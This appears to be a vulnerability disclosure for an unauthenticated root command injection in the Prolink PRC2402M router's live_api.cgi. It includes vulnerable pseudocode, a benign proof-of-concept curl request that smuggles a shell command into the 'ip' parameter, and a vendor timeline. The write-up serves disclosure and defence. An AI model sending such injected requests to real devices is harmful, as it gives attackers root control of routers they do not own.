Description of the vulnerability

This vulnerability is present as there are no checks on user input taken by live_api.cgi, which is passed to system, allowing an attacker to execute arbitrary code in the context of the root user on affected installations of the Prolink PRC2402M router.

No authentication is required to exploit this vulnerability.

The router makes GET requests to interact with the cgi scripts. To access the vulnerable script, visit http://localhost/cgi-bin/live_api.cgi.

In live_api.cgi, the main function retrieves the query string of the HTTP request, and passes it to satellite_status.

    querystring = getenv("QUERY_STRING");
    ...
    if (web_get("page", querystring, 0) != 0)
        satellite_status(query_string);

As seen in the simplified pseudocode of satellite_status below, the user’s parameters ip is passed to do_system (which is just a wrapper of system) without any input validation, allowing an attacker to supply malicious input and gain arbitrary code execution.

void satellite_status(char* querystring)

{
    char *ip;

    ...
    ip = web_get("ip", body, 0);
    ip = strdup(ip);
    ...
    sprintf(command, "echo %s, > /tmp/satellite_list &", ip);
    do_system(command);
    ...
}

Exploit

To exploit this vulnerability, perform a GET request to live_api.cgi with the ip parameter containing the target command to execute.

For example,

curl 'http://localhost/cgi-bin/live_api.cgi?page=satellite_list&ip=$(echo%20gg%3E/tmp/gg)&id=1'

(Note that proper URL encoding should be applied on the querystring parameters for the server to handle the request.)

Timeline

2021-06-09 Reported to Vendor, Prolink
2021-06-09 Prolink acknowledged report
2021-06-10 Prolink claimed to have patched it
2021-06-11 Team member Daniel Lim sent in his bypass for their patch
2021-06-11 Prolink acknowledged the new bypass
2021-06-13 Prolink fixed it

Description of the vulnerability#

Exploit#

Timeline#

Description of the vulnerability

Exploit

Timeline